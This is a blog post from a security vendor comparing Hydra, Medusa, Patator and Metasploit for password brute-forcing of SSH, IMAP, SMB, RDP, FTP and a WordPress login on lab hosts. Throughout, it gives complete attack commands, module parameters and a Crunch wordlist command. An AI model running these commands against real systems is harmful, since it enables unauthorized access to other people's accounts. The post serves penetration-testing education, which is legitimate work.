Open in app

Sign in

Write

Sign in

Brute-force from SSH to Web

Nemesida WAF
8 min readAug 22, 2019

Brute force (exhaustive search) is usually used in hacker attack context, when an intruder tries to pick up a login/password to some account or service. Let’s examine possible tools for brute-force attacks, that are included in Kali Linux: Hydra 8.6, Medusa 2.2, Patator 0.7 and Metasploit Framework 4.17.17-dev. Depending on supported protocols we will use the most suitable tools. The password dictionary we will generate by ourselves using Crunch.

The information is for introduction only. Do not break the law.

Dictionary generation

Crunch

We took small users dictionary and write only four users down.

Crunch is used for the dictionary creating as an built in tool. The tool is flexible and is able to make a dictionary according to the mask. If there is possibility the user can use a dictionary-made password, it is better to use ready-made solution and as an experience shows the most popular password is «123456».

We will generate the dictionary on 5 characters using mask. This method is using when we can imagine the user password structure.

crunch 5 5 qwe ASD 1234567890 -t @@,%@ -o /root/wordlist.txt

5 — is a minimum or maximum characters number;
qwe, ASD, 1234567890 — used characters;
-t — the key, after which the password mask is indicated;
@ — lowercase;
, — upper case;
% — numeric.

We notice that in first steps we will describe using keys for every tool but later we will not do this because they are similar and that is why their syntax is the same.

SSH

Patator

patator ssh_login host=192.168.60.50 user=FILE0 password=FILE1 0=/root/username 1=/root/wordlist.txt -x ignore:mesg=’Authentication failed’

ssh_login — module;
host — target;
user — the user login for which the password is picked up or the file with logins for password mining;
-x ignore:mesg=’Authentication failed’ — the command not to display the string which contains this message. The filtering parameter is selected individually.

We tested all tools with the default threads number and did not change it. Patator has done the task in 7 minutes 37 seconds selected 2235 of variants.

Hydra

hydra -f -L /root/username -P /root/wordlist.txt ssh://192.168.60.50

-f — stop as soon as the couple login/password is found successfully;
-L/-P — path to the users/passwords dictionary;
ssh://IP address — service and victim IP address indication.

Medusa

medusa -h 192.168.60.50 -U /root/username -P /root/wordlist.txt -M ssh

-h — target machine IP address;
-U/-P — path to the users/passwords dictionary;
-M — choosing of the necessary module.

Medusa operated only 715 combinations login/password for 25 minutes, that is why that tool is not the best choice in case with SSH brute force.

Metasploit

Let’s find a tool for brute-force attack using SSH: search ssh_login
Use module: use auxiliary/scanner/ssh/ssh_login

To watch necessary parameters use the command «show options». Where:

rhosts — victim IP address;
rport — port;
user_file — path to the login dictionary;
pass_file — path to the password dictionary;
stop_on_success — stop as soon as the login/password couple will be found.

By default Metasploit uses 1 thread, that is why the brute force speed is very low. The password found attempt was failed.

IMAP

Patator

patator imap_login host=192.168.100.109 user=FILE0 password=FILE1 0=/root/username 1=/root/wordlist.txt -x ignore:code=1

imap_login — module which is used;
-x — parameter that helps to filter answers from Patator. In this case the answers with the code 1 should be ignored.

The parameter x is unique for every case, that is why it is recommended at first to start it without the parameter and see, what answers will be, to ignore them.

Thus, Patator found the password in 9 minutes 28 seconds. The result looks like SSH one.

Hydra

hydra -f imap://192.168.60.50 -L /root/username -P /root/wordlist.txt

Hydra has done the task in 10 minutes 47 seconds, that is rather good result.

Medusa

The self-signed certificate was used on the server, that is why Medusa displayed an error. The attempts to correct it using the tool settings were failed.

Metasploit

In Metasploit necessary module was not found.

SMB

Patator

During Patator work there were a lot of false positives.

Hydra

hydra -L /root/username -P /root/wordlist.txt 192.168.60.50 smb

Thanks to its algorithms Hydra has done the task in 5 seconds.

Medusa

medusa -h 192.168.60.50 -U /root/username -P /root/wordlist.txt -M smbnt

Running the tool, I expected the results would be like previous ones, but Medusa surprised me and has done the task in few seconds.

Metasploit

Using search smb_login we find necessary module scanner/smb/smb_login and use it. You should indicate parameters:

RHOSTS — victim IP address;
USER_FILE — users dictionary;
PASS_FILE — passwords dictionary;
STOP_ON_SUCCESS — stop as soon as the login/password couple will be found.

Metasploit has done the task in 1 minute.

RDP

Patator

patator rdp_login host=192.168.60.50 user=FILE0 password=FILE1 0=/root/username 1=/root/wordlist.txt -x ignore:code=132

Unfortunately at this moment Patator is the only one between the testing tools which is able to find login/password for RDP protocol. Patator has done the task but there was a false positive.

WEB

First of all we should understand the authentication process. For that we should send test authentication requests and according to web application behavior we can see that if the password is wrong the answer code is 200 and if the authentication is successful the code is 302. Use this information.

Patator

Taking into account web application answers, create a command for Patator:

patator http_fuzz url=http://site.test.lan/wp-login.php method=POST body=’log=FILE0&pwd=FILE1&wp-submit=Log+In&redirect_to=http%3A%2F%2Fsite.test.lan%2Fwp-admin%2F&testcookie=1' 0=/root/username 1=/root/wordlist.txt before_urls=http://site.test.lan/wp-login.php -x ignore:code=200 accept_cookie=1

http_fuzz — module for brute force attack on HTTP;
url — authentication page address;
FILE0 — path to the password dictionary;
body — information that transmits in POST request during the authentication;
-t — threads number;
-x — in this case we indicated the command not to display messages contain parameter with code 200;
accept_cookie — saving the cookie parameter and transition of it into next request.

As a result we found the password in 30 seconds, that is very fast.

Hydra

As we know, if the authentication is wrong the code 200 returns and if the authentication is successful the code is 302. Let’s use this information and run the command:

hydra -f -L /root/username -P /root/wordlist.txt http-post-form://site.test.lan -m “/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fsite.test.lan%2Fwp-admin%2F&testcookie=1:S=302”

-f — finish brute force as soon as the login/password couple will be found;
-L — users dictionary;
-P — passwords dictionary;
http-post-form — form type (POST);
/wp-login.php — URL of the authentication page;
^PASS^ — shows where the password from the dictionary should be filled;
S=302 — indicator what answer should Hydra take into account. In our case the answer is 302 if the authentication is successful.

Through 3 minutes 15 seconds the success was.

Medusa

medusa -h site.test.lan -U /root/username -P /root/wordlist.txt -M web-form -m FORM:”/wp-login.php” -m FORM-DATA:”post?log=&pwd=&wp-submit=Log+In&redirect_to=http%3A%2F%2Fsite.test.lan%2Fwp-admin%2F&testcookie=1"

Unfortunately, when the brute force attempts Medusa makes an an error «Segmentation fault».

Metasploit

Using the search search wordpress_login we find necessary module auxiliary/scanner/http/wordpress_login_enum and use it. We should notice parameters:

PASS_FILE — password dictionary;
RHOSTS — victim IP address;
STOP_ON_SUCCESS — stop as soon as the login/password couple will be found;
VALIDATE_USERS — switch the user account check off;
VERBOSE — switch extra output off;
VHOST — domain name of the attacked site.

The time is 32 seconds.

FTP

Patator

patator ftp_login host=192.168.60.50 user=FILE0 password=FILE1 0=/root/username 1=/root/wordlist.txt -x ignore:code=530

In this module Patator works more slowly than with web forms. Password was found in 11 minutes 20 seconds.

Hydra

hydra -f -L /root/username -P /root/wordlist.txt ftp://192.168.60.50

Operating by default in 16 threads, Hydra picked up passwords in 7 minutes 55 seconds.

Metasploit, Medusa

In Metasploit we use the command: auxiliary/scanner/ftp/ftp_login

In Medusa the request looks:

medusa -f -M ftp -U /root/username -P /root/wordlist.txt -h 192.168.60.50

All parameters are standard, we notice the path to the dictionaries and have to set finish as soon as a couple login/password will be found. With this protocol and SSH using standard number of threads Medusa and Metasploit cope bad. That is why if you wish use only these tools you have to manually increase threads number, that is not so easy. Using these tools in one-thread mode FTP server broke the connection. There was not this situation using Patator or Hydra. That is why there is possibility that the increasing of threads number would not change the situation.

Conclusion

After the testing different but similar to each other tools on various services, we can say that every tool has its own advantages and disadvantages, but what tool to use is your decision. Below is summary table with testing results that we got:

You can train without breaking law in our laboratories lab.pentestit.ru.

Hacking
Hydra
Patator
Medusa
Metasploit

--

--

Nemesida WAF

Written by Nemesida WAF

422 Followers

A modern on-prem application security platform that protects all forms web traffic, services and APIs. Powered by Nemesida AI.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams